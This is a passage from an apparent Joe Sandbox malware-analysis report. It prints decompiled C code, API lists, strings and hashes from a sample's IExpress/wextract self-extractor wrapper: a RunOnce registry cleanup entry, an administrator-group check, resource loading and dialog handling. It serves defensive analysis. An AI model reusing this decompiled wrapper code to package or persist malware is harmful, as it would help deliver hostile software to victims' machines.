							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup3", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00196CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}



















                                                                                                                                                                                                                                    0x00192272
                                                                                                                                                                                                                                    0x00192277
                                                                                                                                                                                                                                    0x00192279
                                                                                                                                                                                                                                    0x00192283
                                                                                                                                                                                                                                    0x00192289
                                                                                                                                                                                                                                    0x001922ab
                                                                                                                                                                                                                                    0x001922b1
                                                                                                                                                                                                                                    0x001922c4
                                                                                                                                                                                                                                    0x001922e0
                                                                                                                                                                                                                                    0x001922e6
                                                                                                                                                                                                                                    0x001922f5
                                                                                                                                                                                                                                    0x0019230d
                                                                                                                                                                                                                                    0x0019231c
                                                                                                                                                                                                                                    0x0019231c
                                                                                                                                                                                                                                    0x00192321
                                                                                                                                                                                                                                    0x0019233a
                                                                                                                                                                                                                                    0x00192342
                                                                                                                                                                                                                                    0x00192348
                                                                                                                                                                                                                                    0x0019234b
                                                                                                                                                                                                                                    0x0019234c
                                                                                                                                                                                                                                    0x0019234c
                                                                                                                                                                                                                                    0x0019234e
                                                                                                                                                                                                                                    0x0019234f
                                                                                                                                                                                                                                    0x0019236e
                                                                                                                                                                                                                                    0x0019236e
                                                                                                                                                                                                                                    0x0019237a
                                                                                                                                                                                                                                    0x00192380
                                                                                                                                                                                                                                    0x00192380
                                                                                                                                                                                                                                    0x00192381
                                                                                                                                                                                                                                    0x00192381
                                                                                                                                                                                                                                    0x0019238f

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 001922A3
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000000,?,?,00000001), ref: 001922D8
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 001922F5
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00192305
                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0019236E
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0019237A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00192321
                                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00192299
                                                                                                                                                                                                                                    • wextract_cleanup3, xrefs: 0019227C, 001922CD, 00192363
                                                                                                                                                                                                                                    • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0019232D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup3
                                                                                                                                                                                                                                    • API String ID: 3027380567-1707933020
                                                                                                                                                                                                                                    • Opcode ID: 4d4619245fc2150ae98e98e56f5a88f5a18e026319aa667f585c8d7092464c23
                                                                                                                                                                                                                                    • Instruction ID: 423799fe88587344b739a35db78d43a7b9a7c282b628a1eac04eb077ccbe6174
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d4619245fc2150ae98e98e56f5a88f5a18e026319aa667f585c8d7092464c23
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99319371A00218BBDF219B65DC49FEA7B7CEF59740F4401AAF50DE6051EB71AF88CA90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00193100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E00193100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x198590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x198590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E001943D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x198d4c);
					SetWindowTextA(_t33, "doza2");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x1988b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E001930C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}









                                                                                                                                                                                                                                    0x00193108
                                                                                                                                                                                                                                    0x0019310b
                                                                                                                                                                                                                                    0x001931b7
                                                                                                                                                                                                                                    0x001931ca
                                                                                                                                                                                                                                    0x001931d0
                                                                                                                                                                                                                                    0x001931d0
                                                                                                                                                                                                                                    0x001931da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001931da
                                                                                                                                                                                                                                    0x00193111
                                                                                                                                                                                                                                    0x00193114
                                                                                                                                                                                                                                    0x00193136
                                                                                                                                                                                                                                    0x00193136
                                                                                                                                                                                                                                    0x00193138
                                                                                                                                                                                                                                    0x0019313b
                                                                                                                                                                                                                                    0x00193141
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193143
                                                                                                                                                                                                                                    0x00193116
                                                                                                                                                                                                                                    0x0019311b
                                                                                                                                                                                                                                    0x0019314b
                                                                                                                                                                                                                                    0x00193151
                                                                                                                                                                                                                                    0x00193158
                                                                                                                                                                                                                                    0x0019316a
                                                                                                                                                                                                                                    0x00193176
                                                                                                                                                                                                                                    0x0019317d
                                                                                                                                                                                                                                    0x0019318b
                                                                                                                                                                                                                                    0x0019319e
                                                                                                                                                                                                                                    0x001931a3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001931ad
                                                                                                                                                                                                                                    0x00193120
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019312a
                                                                                                                                                                                                                                    0x00193134
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193134
                                                                                                                                                                                                                                    0x0019312c
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 0019313B
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0019314B
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000834), ref: 0019316A
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 00193176
                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0019317D
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000834), ref: 00193185
                                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000FC), ref: 00193190
                                                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,001930C0), ref: 001931A3
                                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 001931CA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                    • String ID: doza2
                                                                                                                                                                                                                                    • API String ID: 3785188418-612509477
                                                                                                                                                                                                                                    • Opcode ID: 8602a0b3a0d40fe2cc255cdedbc3821d6d470a0df9fd53a7f7532240eabc95e2
                                                                                                                                                                                                                                    • Instruction ID: 27bc4c927435b567ab4d2afdec71bd900b1ec323962b579187710f89557f3fe1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8602a0b3a0d40fe2cc255cdedbc3821d6d470a0df9fd53a7f7532240eabc95e2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A11B131648221BBDF116F249C0CB9A3AA4FF4B720F500632F835D19F0DB719A85C796
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 001918A3 Relevance: 16.6, APIs: 11, Instructions: 112memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                                    			E001918A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x198004; // 0x21bd9a3c
				_v8 = _t23 ^ _t53;
				_t25 =  *0x198128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00196CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E001917EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x198128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x198128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}


















                                                                                                                                                                                                                                    0x001918a3
                                                                                                                                                                                                                                    0x001918a3
                                                                                                                                                                                                                                    0x001918ab
                                                                                                                                                                                                                                    0x001918b2
                                                                                                                                                                                                                                    0x001918b5
                                                                                                                                                                                                                                    0x001918be
                                                                                                                                                                                                                                    0x001918c0
                                                                                                                                                                                                                                    0x001918c6
                                                                                                                                                                                                                                    0x001918c7
                                                                                                                                                                                                                                    0x001918ca
                                                                                                                                                                                                                                    0x001918cf
                                                                                                                                                                                                                                    0x001919c9
                                                                                                                                                                                                                                    0x001919d8
                                                                                                                                                                                                                                    0x001919d8
                                                                                                                                                                                                                                    0x001918df
                                                                                                                                                                                                                                    0x001919b8
                                                                                                                                                                                                                                    0x001919bd
                                                                                                                                                                                                                                    0x001919bf
                                                                                                                                                                                                                                    0x001919bf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001919bd
                                                                                                                                                                                                                                    0x001918fa
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191912
                                                                                                                                                                                                                                    0x001919aa
                                                                                                                                                                                                                                    0x001919ad
                                                                                                                                                                                                                                    0x001919b3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191927
                                                                                                                                                                                                                                    0x00191927
                                                                                                                                                                                                                                    0x00191932
                                                                                                                                                                                                                                    0x00191936
                                                                                                                                                                                                                                    0x001919a9
                                                                                                                                                                                                                                    0x001919a9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001919a9
                                                                                                                                                                                                                                    0x0019194c
                                                                                                                                                                                                                                    0x001919a2
                                                                                                                                                                                                                                    0x001919a3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019196e
                                                                                                                                                                                                                                    0x00191970
                                                                                                                                                                                                                                    0x00191999
                                                                                                                                                                                                                                    0x0019199c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019199c
                                                                                                                                                                                                                                    0x00191972
                                                                                                                                                                                                                                    0x00191972
                                                                                                                                                                                                                                    0x00191975
                                                                                                                                                                                                                                    0x00191984
                                                                                                                                                                                                                                    0x00191985
                                                                                                                                                                                                                                    0x0019198a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019198c
                                                                                                                                                                                                                                    0x00191991
                                                                                                                                                                                                                                    0x00191996
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191996
                                                                                                                                                                                                                                    0x0019194c

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 001917EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001918DD), ref: 0019181A
                                                                                                                                                                                                                                      • Part of subcall function 001917EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0019182C
                                                                                                                                                                                                                                      • Part of subcall function 001917EE: AllocateAndInitializeSid.ADVAPI32(001918DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001918DD), ref: 00191855
                                                                                                                                                                                                                                      • Part of subcall function 001917EE: FreeSid.ADVAPI32(?,?,?,?,001918DD), ref: 00191883
                                                                                                                                                                                                                                      • Part of subcall function 001917EE: FreeLibrary.KERNEL32(00000000,?,?,?,001918DD), ref: 0019188A
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 001918EB
                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 001918F2
                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0019190A
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00191918
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,?,?), ref: 0019192C
                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00191944
                                                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00191964
                                                                                                                                                                                                                                    • EqualSid.ADVAPI32(00000004,?), ref: 0019197A
                                                                                                                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 0019199C
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 001919A3
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 001919AD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2168512254-0
                                                                                                                                                                                                                                    • Opcode ID: 27a27719d98046b0402c2f22860fad03b6788cc8ba144744d9bf561ce3021134
                                                                                                                                                                                                                                    • Instruction ID: da93aa154604930595b666b2d88573e7d5245d9d78d0bcb2782196ce48c79a56
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27a27719d98046b0402c2f22860fad03b6788cc8ba144744d9bf561ce3021134
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7310971A0020AAFDF209FA5DC98ABFBBB8FF45744F54042AF545D2160DB319989CB62
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0019468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                    			E0019468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}








                                                                                                                                                                                                                                    0x00194699
                                                                                                                                                                                                                                    0x0019469b
                                                                                                                                                                                                                                    0x001946a9
                                                                                                                                                                                                                                    0x001946af
                                                                                                                                                                                                                                    0x001946b4
                                                                                                                                                                                                                                    0x001946bc
                                                                                                                                                                                                                                    0x001946f9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001946f9
                                                                                                                                                                                                                                    0x001946d9
                                                                                                                                                                                                                                    0x001946dd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001946e5
                                                                                                                                                                                                                                    0x001946ef
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001946f5
                                                                                                                                                                                                                                    0x001946ff

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946A0
                                                                                                                                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946A9
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946C3
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946CC
                                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946D3
                                                                                                                                                                                                                                    • memcpy_s.MSVCRT ref: 001946E5
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001946EF
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                    • String ID: TITLE$doza2
                                                                                                                                                                                                                                    • API String ID: 3370778649-4167907646
                                                                                                                                                                                                                                    • Opcode ID: c8bb88cb93df4b773da6235b6bd3cd720b93d41d0791376bbe8b4041beb0a402
                                                                                                                                                                                                                                    • Instruction ID: ac3ab935de6803287a9318d32a50a3762a801a95d2f9f38fce668db5d4321dbb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8bb88cb93df4b773da6235b6bd3cd720b93d41d0791376bbe8b4041beb0a402
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1401F9722403007BE71017A55C0DF2B3E2CDFC6F51F480026FB4987140CA71988582F2
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 001917EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71librarymemoryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                                                                                                    			E001917EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x198004; // 0x21bd9a3c
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x19a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00196CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}



















                                                                                                                                                                                                                                    0x001917f6
                                                                                                                                                                                                                                    0x001917fd
                                                                                                                                                                                                                                    0x00191805
                                                                                                                                                                                                                                    0x0019180b
                                                                                                                                                                                                                                    0x0019180d
                                                                                                                                                                                                                                    0x00191815
                                                                                                                                                                                                                                    0x00191818
                                                                                                                                                                                                                                    0x00191820
                                                                                                                                                                                                                                    0x00191824
                                                                                                                                                                                                                                    0x0019182c
                                                                                                                                                                                                                                    0x00191832
                                                                                                                                                                                                                                    0x00191837
                                                                                                                                                                                                                                    0x00191851
                                                                                                                                                                                                                                    0x00191854
                                                                                                                                                                                                                                    0x0019185d
                                                                                                                                                                                                                                    0x00191862
                                                                                                                                                                                                                                    0x0019186c
                                                                                                                                                                                                                                    0x00191872
                                                                                                                                                                                                                                    0x00191877
                                                                                                                                                                                                                                    0x0019187e
                                                                                                                                                                                                                                    0x0019187e
                                                                                                                                                                                                                                    0x00191883
                                                                                                                                                                                                                                    0x00191883
                                                                                                                                                                                                                                    0x0019185d
                                                                                                                                                                                                                                    0x0019188a
                                                                                                                                                                                                                                    0x0019188a
                                                                                                                                                                                                                                    0x001918a2

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001918DD), ref: 0019181A
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0019182C
                                                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(001918DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001918DD), ref: 00191855
                                                                                                                                                                                                                                    • FreeSid.ADVAPI32(?,?,?,?,001918DD), ref: 00191883
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,001918DD), ref: 0019188A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                    • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                    • Opcode ID: 585ea8dc62aee96a5024582ee09d75fe9c002046a39a98741a619cc455940f58
                                                                                                                                                                                                                                    • Instruction ID: 1cdb323afa44f6bb9b489f0199641d5630e262802713c7a0120e03e8270e8732
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 585ea8dc62aee96a5024582ee09d75fe9c002046a39a98741a619cc455940f58
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8119331E00209BBDB109FA4EC49ABEBB78EF44700F54056AFA11E2290DB309D448BD2
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00193450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00193450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E001943D0(_t24, _t12);
					SetWindowTextA(_t24, "doza2");
